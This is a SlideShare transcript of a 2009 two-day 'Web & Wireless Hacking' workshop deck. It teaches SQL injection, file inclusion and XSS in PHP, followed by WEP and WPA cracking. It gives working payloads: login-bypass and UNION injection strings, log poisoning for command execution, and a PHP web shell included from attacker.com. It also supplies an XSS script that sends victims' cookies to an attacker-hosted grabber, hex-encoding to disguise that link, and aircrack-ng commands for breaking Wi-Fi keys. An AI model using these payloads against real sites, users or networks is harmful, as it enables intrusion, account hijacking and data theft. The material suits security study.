• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Web & Wireless Hacking
 

Web & Wireless Hacking

on

  • 1,514 views

Complete Guide on Web & Wireless Hacking

Complete Guide on Web & Wireless Hacking

Statistics

Views

Total Views
1,514
Views on SlideShare
1,510
Embed Views
4

Actions

Likes
1
Downloads
60
Comments
0

1 Embed 4

http://www.linkedin.com 4

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Web & Wireless Hacking Web & Wireless Hacking Presentation Transcript

    • IPSECS WEB & WIRELESS HACKING Don “df0x” Anto Makasar, Juni 2009 www.ipsecs.com
    • IPSECS Content • Introduction • Web Exploitation – SQL Injection – File Inclussion – XSS • Breaking Wireless Infrastructure – War Driving – Exploiting Wireless Network www.ipsecs.com
    • IPSECS Introduction • Don “df0x” Anto • IT security researcher • Hacker?? Not, but IT security researcher • Contact – we@ipsecs.com • URL – http://ipsecs.com – http://kandangjamur.net • Bachelor degree in Electrical engineering • Add my facebook dj.antoxz@gmail.com www.ipsecs.com
    • IPSECS st 1 Day, WEB HACKING www.ipsecs.com
    • IPSECS Web Exploitation • Its exploiting web application programming flaws. • Programming mistakes are always happen. • Targeting clients or servers. • Possible to steal databases and other sensitif informations, steal cookie or session, execute arbitrary commands, or fully compromise the system. • Its easy to do. Google helps you :). www.ipsecs.com
    • IPSECS Common Web Exploitation • SQL Injection, an attack whichs targeting sensitive information in database server. Possible to compromise system. • File Inclussion, an attack which usually to gain shell access on the remote target. – Local file inclussion – Remote file inclussion • Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website. – Doom – Persistent – Non-persistent www.ipsecs.com
    • IPSECS SQL INJECTION www.ipsecs.com
    • IPSECS SQL Injection • Injecting malicious SQL query to take profits. • Usually is used to bypass login, steal sensitive information on database. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
    • IPSECS SQL Injection in login form • User input in login form is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query through login form and bypassing login process. • Attacker can also execute other SQL query. www.ipsecs.com
    • IPSECS Vulnerable Code • Example vulnerable code in login process: $pass = md5($_POST[password]); $query = "SELECT * FROM tblUser WHERE username = " . $_POST[username] . " AND password = " . $pass . ""; $q = mysql_query($query); • Username whichs sent from login form is not validated. www.ipsecs.com
    • IPSECS Exploit Login • Exploit code: username = admin OR a=a password = terserah • SQL query to be executed by database server is: SELECT * FROM tblUser WHERE username = admin OR a=a AND password = e00b29d5b34c3f78df09d45921c9ec47 www.ipsecs.com
    • IPSECS SQL Injection in login form www.ipsecs.com
    • IPSECS SQL Logic • AND operator is executed before OR, result of query is: a=a AND password = e00b29d5b34c3f78df09d45921c9ec47 • Boolean logic result is FALSE, then: username = admin OR FALSE • Boolean logic result is TRUE (admin). • Attacker successfully bypassing login form. www.ipsecs.com
    • IPSECS SQL Injection in URI parameter • Parameter input in URI is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query by modifying parameter input. www.ipsecs.com
    • IPSECS Vulnerable Code • Example vulnerable code while inputing URI parameters: $query = "SELECT * FROM news WHERE id=" . $_GET[aid] ; $q = mysql_query($query); • Parameter aid whichs taken from URI is not validated. www.ipsecs.com
    • IPSECS Exploiting SQL Injection • Checking vulnerability using AND logic http://example.com/news.php?aid=1 AND 1=1-- http://example.com/news.php?aid=1 AND 1=0-- • Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1-- http://example.com/news.php?aid=1 UNION SELECT 1,2-- http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n-- www.ipsecs.com
    • IPSECS Knowing Number of Field www.ipsecs.com
    • IPSECS SQL Injection in URI parameter • In Case table which generates “news” contains 3 fields www.ipsecs.com
    • IPSECS Exploiting SQL Injection • Knowing tables in database http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- • Knowing fields in table tblUser http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=tblUser-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572-- www.ipsecs.com
    • IPSECS Knowing Tables in DB www.ipsecs.com
    • IPSECS Exploiting SQL Injection • Viewing information in tables http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser-- • Viewing arbitrary files (if FILE access is granted) http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(/etc/passwd)-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)-- www.ipsecs.com
    • IPSECS Viewing Table Records www.ipsecs.com
    • IPSECS FILE INCLUSSION www.ipsecs.com
    • IPSECS File Inclussion • Including malicious or sensitive file to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command, or compromise system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
    • IPSECS Local File Inclussion • Including sensitive file in local server (vulnerable server) to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. www.ipsecs.com
    • IPSECS Vulnerable Code • Example vulnerable code: define(DOCROOT, /var/www/html/modules); $filename = DOCROOT . "/" . $_GET[module] . ".php"; include($filename); • Parameter module whichs taken from URI is not validated. www.ipsecs.com
    • IPSECS Viewing Sensitive Files • Exploit code to viewing sensitive files on vulnerable system: http://example.com/index.php?module=../../../../../../../etc/passwd%00 http://example.com/index.php?module=../../../../../../../etc/group%00 www.ipsecs.com
    • IPSECS File /etc/passwd www.ipsecs.com
    • IPSECS Placing Malicious Log • Placing malicious apache log uses telnet to inject system command: $ telnet example.com 80 Trying example.com... Connected to example.com. Escape character is ^]. GET /<?php passthru($_GET[cmd]) ?> HTTP/1.1 Host:example.com www.ipsecs.com
    • IPSECS Malicious Log www.ipsecs.com
    • IPSECS Executing Command • Executing command via access_log apache (in case apache log is readable) http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=uname -a http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=id www.ipsecs.com
    • IPSECS Command “id” www.ipsecs.com
    • IPSECS Remote File Inclussion • Including sensitive file in remote server (attacker server) to be executed by server. • Usually to execute arbitrary command using web shell. Further attack can be used in fully compormising system. • User input is not well validated or no sanitation process. www.ipsecs.com
    • IPSECS Vulnerable Code • Example vulnerable code: $filename = $_GET[page] . ".php"; include($filename); • Parameter page whichs taken from URI is not validated. www.ipsecs.com
    • IPSECS PHP Shell • Simple web shell: <?php /*Basic PHP web shell injek.txt*/ if(isset($_GET[exec])){ if(!empty($_GET[exec])){ $cmd = $_GET[exec]; if(function_exists(passthru)){ passthru($cmd); } } } ?> www.ipsecs.com
    • IPSECS Public PHP Shell • Widely known web shell : r57, c99 • Commonly used in exploiting remote file inclussion. www.ipsecs.com
    • IPSECS r57 www.ipsecs.com
    • IPSECS Executing Command • Injecting command: http://example.com/view.php? page=http://attacker.com/injek.txt&exec=id http://example.com/view.php? page=http://attacker.com/injek.txt&exec=ls -al www.ipsecs.com
    • IPSECS Command ls -al www.ipsecs.com
    • IPSECS CROSS SITE SCRIPTING www.ipsecs.com
    • IPSECS Cross Site Scripting • Inserting HTML/java script code to be executed by client browser which views vulnerable website. • Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
    • IPSECS Cross Site Scripting • Doom based XSS, XSS in vulnerable file which comes from default installed software. • Non-Persistent XSS, XSS in vulnerable web page which can be exploited by tricking user to click malicious URI. Characteristic : temporal. • Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent. www.ipsecs.com
    • IPSECS Vulnerable Code • Example vulnerable code: echo "<pre> Searching for ". $_GET[key] . "...</pre><br/>n"; • Parameter key whichs sent from search form is not validated. www.ipsecs.com
    • IPSECS Cross Site Scripting • Checking if XSS vulnerable: http://example.com/search.php?key=<script>alert(XSS found dude!)</script> www.ipsecs.com
    • IPSECS Cross Site Scripting www.ipsecs.com
    • IPSECS Cookie Stealing • Stealing cookie: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> • Content payload.js document.location="http://attacker.com/cookie-save.php? c="+document.cookie www.ipsecs.com
    • IPSECS Cookie Grabber • Content of cookie-save.php: <?php /*Cookie stealer*/ $f = fopen(/tmp/cookie.txt, a); $date = date("j F, Y, g:i a"); fwrite($f, "IP Address : ". $_SERVER[REMOTE_ADDR] ."n". "Cookie : ". $_GET[c] ."n". "Date and Time : ". $date ."n". "nn"); fclose($f); ?> www.ipsecs.com
    • IPSECS Hexal Encoding • Anonymize malicious URI using hexal encoding: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> HEXAL ENCODING http://example.com/search.php?key=%3c %73%63%72%69%70%74%20%73%72%63%3d %22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b %65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e %6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e www.ipsecs.com
    • IPSECS DEMO - Q&A WEB HACKING www.ipsecs.com
    • IPSECS THANK YOU! www.ipsecs.com
    • IPSECS nd 2 Day, WIRELESS HACKING www.ipsecs.com
    • IPSECS Wireless Network • Now, is widely used in campus, government, company, and many public places. • Provide network for mobile devices. • More flexible than wired network. • More insecure than wired network, so here we go! www.ipsecs.com
    • IPSECS War Driving • Activity to search Wi-Fi wireless network. • Public tools to do War Driving – Windows : NetStumbler, Wireshark – Linux : Kismet, AirCrack-ng, AirSnort, Wireshark – OSX : KisMac • Im using Linux Ubuntu 8.10. www.ipsecs.com
    • IPSECS Kismet • Console based 802.11 wireless network detector and sniffer. • It identifies wireless network by pasively sniffing. • Its already exist on Ubuntu Repository or you can download from www.kismetwireless.net. • Use apt-get install kismet on Ubuntu, read the README if you want to install from source. www.ipsecs.com
    • IPSECS Kismet www.ipsecs.com
    • IPSECS Kismet www.ipsecs.com
    • IPSECS Kismet www.ipsecs.com
    • IPSECS AirSnort • GUI based 802.11 wireless network detector. • Designed for WEP Cracker. • It isnt ready on my Ubuntu repository, download from www.sourceforge.net. • Read the README to install. www.ipsecs.com
    • IPSECS aircrack-ng (formerly : aircrack) • Console based 802.11 wireless network detector. • Designed for WEP & WPA-PSK Cracker. • Its already exist on Ubuntu repository or you can downlod from www.aircrack-ng.org. • Use apt-get install aircrack-ng on Ubuntu, read the README if you want to install from source. www.ipsecs.com
    • IPSECS aircrack-ng (formerly : aircrack) airodump wlan0 www.ipsecs.com
    • IPSECS Wireshark • GUI based network protocol analyzer for UNIX and Windows. • The most complete protocol analyzer which support many data communication protocols. • Its already exist on Ubuntu repository or you can download from www.wireshark.org. • Use apt-get install wireshark on Ubuntu,read the README if you want to install from source. www.ipsecs.com
    • IPSECS Wireshark www.ipsecs.com
    • IPSECS NetStumbler • Best known windows tool to find wireless networks. • It is function like Kismet on linux or KisMac on OSX. • You can download NetStumbler in www.netstumbler.com • Since I use ubuntu, theres no demo for this tool. www.ipsecs.com
    • IPSECS NetStumbler www.ipsecs.com
    • IPSECS Wireless Network Protection • MAC Filtering • WEP (Wired Equivalent Privacy) • WPA (Wi-Fi Protected Access) • WPA2 (Wi-Fi Protected Access 2) • Captive Portal www.ipsecs.com
    • IPSECS Exploiting Wireless Network • Miss Configuration (Human Error) • Spoofing • Cracking Protection • Denial of Service www.ipsecs.com
    • IPSECS Miss Configuration • Default Configuration on Device (Access Point) • Default Username & Password • Default Range IP Address • SNMP public & private community • No encryption enabled www.ipsecs.com
    • IPSECS Spoofing & Rogue AP • Spoofing MAC address to bypass MAC filtering. • Tools – Linux : ifconfig – Windows : smac, regedit • Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing. • Tools – airsnarf http://airsnarf.shmoo.com www.ipsecs.com
    • IPSECS MAC Spoofing www.ipsecs.com
    • IPSECS WEP Cracking • WEP is based on RC4 algorithm and CRC32. • Collecting as much as possible weak IV (Insialization Vector) to be used in FMS attack. • Accelerated collecting IV using traffic injection. • Tools : aircrack-ng, AirSnort www.ipsecs.com
    • IPSECS WEP Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with connected clients on it. Or do fake authentication to associate with AP if no client connected. • Inject packet using aireplay-ng • Dump packet using airodump-ng • Crack dumped file using aircrack-ng www.ipsecs.com
    • IPSECS Dumping Packet airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0 www.ipsecs.com
    • IPSECS Cracking Key aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap Key is “abcdef1234” www.ipsecs.com
    • IPSECS WPA Cracking • WPA is based on RC4 algorithm + TKIP/AES • WPA-PSK can be attack using dictionary attack. • Of course, it needs dictionary • Can be cracked when offline • Tools : aircrack-ng www.ipsecs.com
    • IPSECS WPA Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with which,s protected by WPA. • Dump packet using airodump-ng • Wait for a client to authenticate to AP, or deauthenticate client whichs connected to AP. • Crack dumped file using aircrack-ng www.ipsecs.com
    • IPSECS WPA Cracking airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0 www.ipsecs.com
    • IPSECS WPA Cracking aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap Key is “miko2009” www.ipsecs.com
    • IPSECS Denial of Service • Making wireless network unavailable. • Tools : airjack, void11, aircrack www.ipsecs.com
    • IPSECS DEMO - Q&A WIRELESS HACKING www.ipsecs.com
    • IPSECS THANK YOU! www.ipsecs.com